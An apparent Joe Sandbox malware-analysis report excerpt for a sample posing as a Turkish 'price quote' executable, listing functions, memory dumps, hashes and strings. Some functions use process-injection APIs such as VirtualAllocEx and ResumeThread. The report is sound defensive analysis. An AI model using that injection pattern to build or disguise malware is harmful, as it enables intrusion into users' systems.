Instruction ID: a3be1acfa393ce1ee2cff64edafdc54455c0b4f3c94a6422002dd5ea19f412fa
Opcode Fuzzy Hash: 91686977ed22c7364cd748aa954841f8a7301cc7680519f5ba0c6511e7dc4fa5
Instruction Fuzzy Hash: E42128B1D003599FCB10DFAAC845AEEFBF5FF48310F508429E559A7240C738A954DBA5

Function 00A0D5C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A0D647

Memory Dump Source

Source File: 00000000.00000002.1751648759.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b3b7610ed3c4216ec35253957f706c69ed97305ab5751c2e3c6aa64ec488acaf
Instruction ID: 18be752e784c465ad3d96b5fb350792275efd2a0a3be86863ada1a3fb9cb0638
Opcode Fuzzy Hash: b3b7610ed3c4216ec35253957f706c69ed97305ab5751c2e3c6aa64ec488acaf
Instruction Fuzzy Hash: A121E4B59002089FDB10CF9AD884ADEBFF4FB48310F14841AE918A3350D375A954CF65

Function 06EAE6B9 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06EAE72E

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 032444fad2e9abf8c1e14a91f76e7869accc59c55d5592a44d3a4ca8a3d187a8
Instruction ID: 620bd556a6c0394521c04b0cf6579d568a245cccaff0bbf71ac64996033d1893
Opcode Fuzzy Hash: 032444fad2e9abf8c1e14a91f76e7869accc59c55d5592a44d3a4ca8a3d187a8
Instruction Fuzzy Hash: 3D1156758003499FCB10DFAAC845AEFBFF5EF88320F248819E519A7250CB35A950DFA1

Function 06EAE6C0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06EAE72E

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 341cd0c08645599d0ab3b0e0c3b71718c00cf10eef1312095c29727dad5d8146
Instruction ID: 457128b04ca33a94cb99c00e1182256631cec3b62a3cdcd2332a7c9aa2d6dc42
Opcode Fuzzy Hash: 341cd0c08645599d0ab3b0e0c3b71718c00cf10eef1312095c29727dad5d8146
Instruction Fuzzy Hash: 091167718003099FCB10DFAAC845AEFBFF5EF88320F248819E519A7250CB35A950DFA1

Function 06EAE0FA Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,F0476404), ref: 06EAE162

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c9738fbc6f1febc34b28a3e630e79e6338159473660f41a691561fe6d8436bfe
Instruction ID: e9105055ff8f44355b31f76c5fdb3f542e6e00d4e170c11e8faf2f5198bc28b2
Opcode Fuzzy Hash: c9738fbc6f1febc34b28a3e630e79e6338159473660f41a691561fe6d8436bfe
Instruction Fuzzy Hash: EB1158B19003488BCB10DFAAC8457EFFBF5EB88324F208419D419A7240CA39A944CFA5

Function 06EAE100 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,F0476404), ref: 06EAE162

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9d4ec885e4685dfdaf9a56c6ca25b1e98007b739833579ba923cf3dcc8a63c8b
Instruction ID: 6131bde97d749ee2102f8f45aa2d8c625ec105ef167ebcca2f3e08829f4e6921
Opcode Fuzzy Hash: 9d4ec885e4685dfdaf9a56c6ca25b1e98007b739833579ba923cf3dcc8a63c8b
Instruction Fuzzy Hash: 101125B19003498BDB10DFAAC8457AEFBF5EB89324F248419D519A7240CA79A944CFA5

Function 046D3278 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 046D32DD

Memory Dump Source

Source File: 00000000.00000002.1757450679.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46d0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 517c4ecf4e17f8accdc2c0d19a5620a2974ba07dddbe97cc926c5a9b6618a20b
Instruction ID: d18ce2ba0b700b57d6b8a0154dcc30bd2cbce7a1255159f0f87ac85694663723
Opcode Fuzzy Hash: 517c4ecf4e17f8accdc2c0d19a5620a2974ba07dddbe97cc926c5a9b6618a20b
Instruction Fuzzy Hash: BE1125B58003499FDB10DF9AD885BDEBFF8FB48310F108459E918A3200D375A584CFA1

Function 00A0AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00A0AF3E

Memory Dump Source

Source File: 00000000.00000002.1751648759.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 299020677156573c55a91a8a30d2ba51cf1e3dcceea6fd411399947d366e47b9
Instruction ID: 7a028dfe8d861b03695286add5c31f5ab5a361b7a7781d35f47a3cf81af769e0
Opcode Fuzzy Hash: 299020677156573c55a91a8a30d2ba51cf1e3dcceea6fd411399947d366e47b9
Instruction Fuzzy Hash: 7F1122B6C003498FCB10CF9AD444ADEFBF4EF88324F10841AD519A7250C779A545CFA1

Function 046D3280 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 046D32DD

Memory Dump Source

Source File: 00000000.00000002.1757450679.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46d0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 84c1fb020ed76c515ace9143234290ff8704f8fdbb61059d195cbbaba6858e0b
Instruction ID: 1cf8cc2b7d8890f77b7dc7abced9fcb0242580e8d8b42d4761936ec4408acaa2
Opcode Fuzzy Hash: 84c1fb020ed76c515ace9143234290ff8704f8fdbb61059d195cbbaba6858e0b
Instruction Fuzzy Hash: 7911F2B58003499FDB10DF9AD885BDEBBF8EB48320F108419D918A3200D375A984CFA1

Function 009AD1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750953169.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ad000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b76640d795dce29e90dfb6e58d02de248fa18aabb3a51e9bb9c27831c3b2a50
Instruction ID: 940364cf6e9b22463b8b7ef95555018292ece15f146df62d003cf6be4ac3dbb5
Opcode Fuzzy Hash: 3b76640d795dce29e90dfb6e58d02de248fa18aabb3a51e9bb9c27831c3b2a50
Instruction Fuzzy Hash: 2E2103B1505200DFDB05DF14D8C4B2ABFA5FB99310F24CA69ED1A0B646C33AD816CBA1

Function 009BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751123206.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9437e066ea4db02dae8ebcbcb086f5152ae6841f6e50269d46ead26ad8efe69
Instruction ID: a5b04473dfc098dccc419f085e69a28b9e4caa58ad40d18d23f1181f148986ec
Opcode Fuzzy Hash: c9437e066ea4db02dae8ebcbcb086f5152ae6841f6e50269d46ead26ad8efe69
Instruction Fuzzy Hash: 7621F275605204DFDB14EF14DAC4B66BBA5FB98324F24C96DD80A4B386D33AD807CA61

Function 009BD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751123206.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5e2802fd8ce6b50addf3cb655e44e625cd814f3bbf2f3df60b93198bfe538e
Instruction ID: 8ef120c44fcf32564df1b8a02dad60c37da90554e0d3fbd65bee2fd5c13416da
Opcode Fuzzy Hash: 9a5e2802fd8ce6b50addf3cb655e44e625cd814f3bbf2f3df60b93198bfe538e
Instruction Fuzzy Hash: 84214971604344EFDB05DF14CAC0B25BBA5FB84324F20CA6DD81A4B381D33AD806CB61

Function 009AD1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750953169.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ad000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
Instruction ID: 63a44e2f1e7031b76095a096f5277eb200cc42f4896772c65d6629e2a45f7f34
Opcode Fuzzy Hash: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
Instruction Fuzzy Hash: 3821B176504240DFDB06CF50D9C4B16BF72FB85314F24C5A9DD4A0B656C33AD82ACBA1

Function 009BD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751123206.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 3f495b8b9a04e5757cf5d160ba467a47df855b6c473b1ed0b75f2011500739af
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 3F11BB75904284DFDB02CF10C6C4B15BBB2FB84324F24C6ADD8494B296C33AD80ACB61

Function 009BD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751123206.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: c62573a3cce9026dbff21067dc3b4edcd42036f25a870d6890e734c1db2c146d
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 5C11BE75504280CFCB11DF14D6C4B15BB62FB44324F24C6A9D8094B656C33AD80ACB61

Function 009AD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750953169.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ad000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0b8b94e1564ed1a0005ad30accca50e7b5d8744496e1641ecbcc918b243b1aa
Instruction ID: ec5fb478147b46b6a730c38d8ceef3e69f1172a4067eaebf5c1a1d11a0d3e531
Opcode Fuzzy Hash: b0b8b94e1564ed1a0005ad30accca50e7b5d8744496e1641ecbcc918b243b1aa
Instruction Fuzzy Hash: F801DBB10063449AE7145A15DCC4B67FFECDF52325F18C91AED0E0A686C7799840C6F1

Function 009AD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750953169.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ad000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e2d1a41caf980550fc070031702f076ea2180a0ef651c5a4bc63706bb3d56e4
Instruction ID: c54539b50204e539b59871c716ab4e5db2e612d36879acbe1672c23db9b91325
Opcode Fuzzy Hash: 5e2d1a41caf980550fc070031702f076ea2180a0ef651c5a4bc63706bb3d56e4
Instruction Fuzzy Hash: D3F0F6720053449EE7248A06CC88B63FFECEF52735F18C45AED090B686C379AC40CAB1

Non-executed Functions

Function 046D5610 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1757450679.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46d0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccbf392e47a86853f6a63347c5d51f7cceb1b3f80c171eed2693bc3d223113af
Instruction ID: 4a66f2a542c961d30823b9209e84e922e7aa440765421c1a0cd3756f100d2afd
Opcode Fuzzy Hash: ccbf392e47a86853f6a63347c5d51f7cceb1b3f80c171eed2693bc3d223113af
Instruction Fuzzy Hash: 63D19A70B01704AFEB29EB75C550B6EB7F6AF89300F24446DE1469BB91EB35E801CB52

Function 06EAE288 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdce98201baf81d9938dd2d0044ad036dc1771a94049298f37aed2f3dbe9656c
Instruction ID: 47ad21f9fac7da26ec5199ca90374ec58130e19ec9de3e15364979b1f889435b
Opcode Fuzzy Hash: cdce98201baf81d9938dd2d0044ad036dc1771a94049298f37aed2f3dbe9656c
Instruction Fuzzy Hash: 1EE1F774E002198FDB54DFA9C5909AEFBF2FF89304F249169D814AB35AD730A941DFA0

Function 06EAC0D8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6fa17a460e8dd16ccc63fa56f87c3512e2250491d7a11e2bac26edbc03573e8
Instruction ID: 26df4e391d1eb1ab125e03fa9fe87c83b5b8dc8fa085c7e9a09b3ac750a5f059
Opcode Fuzzy Hash: e6fa17a460e8dd16ccc63fa56f87c3512e2250491d7a11e2bac26edbc03573e8
Instruction Fuzzy Hash: 47E1D974E002198FDB54DFA9C5909AEFBF2FF89304F249169D814AB359D731A942CFA0

Function 06EABCA0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb29ea66d0c415f9793cd18c4a2a0b2e3ec0a23d2c61638188344bbd1b28958f
Instruction ID: 712a51c5ce16f29961aae78313085bde7da9cfb71ef360e3837a93c459266204
Opcode Fuzzy Hash: eb29ea66d0c415f9793cd18c4a2a0b2e3ec0a23d2c61638188344bbd1b28958f
Instruction Fuzzy Hash: 3BE1F8B4E002198FCB54DFA9C5909AEFBB2FF89304F249169D814AB359D731A941CFA0

Function 06EAD8D8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25255dad8490eee4a7f34a7019fd197ccfc014db6548b2660207e6fc965fc411
Instruction ID: ec22d70d4cef875b8a75dae6f80ea264d8807200d38135c22209f8e73f6ab159
Opcode Fuzzy Hash: 25255dad8490eee4a7f34a7019fd197ccfc014db6548b2660207e6fc965fc411
Instruction Fuzzy Hash: 35E1E974E002198FCB14DFA9C9909AEFBF2FF89304F249169D815AB759D730A941CFA0

Function 06EAB868 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d591f79245da79fc0f60d9c7e611c757e792abd38059a6e4927546d88f1e41
Instruction ID: aa3c0ca45da1e404159b79baa756a6f15bcc2e89bc57b20d71441d727a4864a2
Opcode Fuzzy Hash: 76d591f79245da79fc0f60d9c7e611c757e792abd38059a6e4927546d88f1e41
Instruction Fuzzy Hash: A3E1EA74E002598FDB54DFA9C590AAEFBF2FF89304F249169D814AB359D730A941CFA0

Function 06EA34F7 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aab8f57bc8c57d57bb604978fd0c1804f1af11e0257af36e07ef15b1b75cb80c
Instruction ID: 249b6a2b45a82d38df689f305eb4f4541ff0e6b44b633f878655ea5fd5b7f47c
Opcode Fuzzy Hash: aab8f57bc8c57d57bb604978fd0c1804f1af11e0257af36e07ef15b1b75cb80c
Instruction Fuzzy Hash: 73D10735D1075A8ACB10FF64D95069EB7B1FF96300F21DB9AE4093B264EB706AC4CB91

Function 00A0D2A4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751648759.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49aa26b8ef6af99ca72452912b943b5b9c4e0358230db3a869751d4b491408cb
Instruction ID: 07d82c3412094c9756b8162798e4e1418d6d2d1966490e93fe4b3f4750f3d442
Opcode Fuzzy Hash: 49aa26b8ef6af99ca72452912b943b5b9c4e0358230db3a869751d4b491408cb
Instruction Fuzzy Hash: DAA14E32E002198FCF19DFB4D94459EBBB2FF85300B15857AE805BB2A5DB71E956CB80

Function 06EA3508 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54161bee2f3cee6c7accbc642645c674abfb0b7f14840281401fbb8da7e41326
Instruction ID: c1f7e203e6073ce930170804db7653b3107f32d7c4489e1a9e348bdfd5697a46
Opcode Fuzzy Hash: 54161bee2f3cee6c7accbc642645c674abfb0b7f14840281401fbb8da7e41326
Instruction Fuzzy Hash: 1ED1E635D1075A8ACB10FF64D95069EB7B1FF96300F20DB9AE5093B254EB706AC4CB91

Function 06EA3B08 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba149eed3eb7474a566039f629879e03aea2e86cbdee4a0de5359dd9ad74bb57
Instruction ID: abbafca1321707dd32653ef61d7d291d911dc0990740ae1821e0bd4f2054e28a
Opcode Fuzzy Hash: ba149eed3eb7474a566039f629879e03aea2e86cbdee4a0de5359dd9ad74bb57
Instruction Fuzzy Hash: 5D81EF70C06718DFEB54DFAAD8847EDBBF2EB49304F10912AD419AB265DB742986CF40

Function 06EA3B03 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5834d11f9d7c730b8b1c2bfcd1086e7ad37caf9ddb0ca245b8d2393c4648e6d4
Instruction ID: ad4ad32f6b5c44619891a8be4f9098d345df862ac5001cc4be8afde9b499419c
Opcode Fuzzy Hash: 5834d11f9d7c730b8b1c2bfcd1086e7ad37caf9ddb0ca245b8d2393c4648e6d4
Instruction Fuzzy Hash: 6081FE70C05718DFEB54DFAAC8847EDBBF2EB49304F10912AD419AB265DB742986CF40

Function 06EAD8C7 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c7d61660208f84bf9e401c025a7d8b39c67fd66a29aa8c9359876ea5b78469
Instruction ID: 3f6e3f787f4df3483c50f64bd4cd8c5c5205d7a44b59778ebb88f579c103f1f8
Opcode Fuzzy Hash: c9c7d61660208f84bf9e401c025a7d8b39c67fd66a29aa8c9359876ea5b78469
Instruction Fuzzy Hash: FB511D74E002198FCB14DF69CA905AEFBF2FF89304F149169D418AB355D731A942CFA0

Analysis Process: F#U0130YAT TEKL#U0130F#U0130-2400.exePID: 7048, Parent PID: 6596COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.9%
Total number of Nodes:	159
Total number of Limit Nodes:	14

Executed Functions

Function 06863130 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 06863806
$dq, xrefs: 0686383B
$dq, xrefs: 0686385F
$dq, xrefs: 0686382F
$dq, xrefs: 06863853
$dq, xrefs: 06863812

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-2331353128
Opcode ID: c41916001f4439a8bb791a2ae5b779b7e8d02c9a377d168bd37bf483a00b0c11
Instruction ID: ca0336e0c2c16762c29448e93b99c46fd4db0917cf43a8ec10964f766d0b3c90
Opcode Fuzzy Hash: c41916001f4439a8bb791a2ae5b779b7e8d02c9a377d168bd37bf483a00b0c11
Instruction Fuzzy Hash: D2321E31E10619CFCB54EF79C95459DB7B2FFC9300F6096A9D409A7264EF30AA85CB90

Function 0686E458 Relevance: 4.3, Strings: 3, Instructions: 572
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oGp, xrefs: 0686E4F0
PHdq, xrefs: 0686E6B8
DqGp, xrefs: 0686E4FC

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: 0oGp$DqGp$PHdq
API String ID: 0-1641917722
Opcode ID: b3e49f8870e3736298398895bf29bae8a3e0864176fd711810c205dc9fe93c10
Instruction ID: 654e280165ea00a8a6f2563238b28dd9c8151a781112faf1ca4cb25645aa86a2
Opcode Fuzzy Hash: b3e49f8870e3736298398895bf29bae8a3e0864176fd711810c205dc9fe93c10
Instruction Fuzzy Hash: 1622C334B142148FDB64DB69D488B6EB7F2EF89310F208569E50ADB3A5DB31EC41CB91

Function 06867A40 Relevance: 3.0, Strings: 2, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 06867FDB
$dq, xrefs: 06867FE7

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: 4e240cc94f3e10708ed246140144c2c392a3a308b70c8732ca5d43eaeba25f23
Instruction ID: 0e42400f0ff1a38c504ab78e684bed08af18d19ebe44370daa144322e1f6ca2a
Opcode Fuzzy Hash: 4e240cc94f3e10708ed246140144c2c392a3a308b70c8732ca5d43eaeba25f23
Instruction Fuzzy Hash: 4D02BD30B002159FDB54DB69D950AAEB7F2FF84318F208969E505DB395DB34ED82CB90

Function 068659AB Relevance: 2.9, Strings: 2, Instructions: 421
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPiq, xrefs: 06865C76
\Oiq, xrefs: 06865ACA

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: XPiq$\Oiq
API String ID: 0-4187271475
Opcode ID: 7d8d53e0d4a8538265d0925e5a0d6778dc73f4b7762fdb5bb6082b8d2d2a7c71
Instruction ID: 68e52f6cd523f869498b9124862094d1f6de57676451af78bee3c1af603c67ec
Opcode Fuzzy Hash: 7d8d53e0d4a8538265d0925e5a0d6778dc73f4b7762fdb5bb6082b8d2d2a7c71
Instruction Fuzzy Hash: 2EE1E331B101148FDB64DB6AD494AAEBBF2FF89310F25856AF146DB391CA31DC41C7A2

Function 06865268 Relevance: 1.8, Strings: 1, Instructions: 593COMMON

Download Yara Rule

Strings

$, xrefs: 0686561E

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

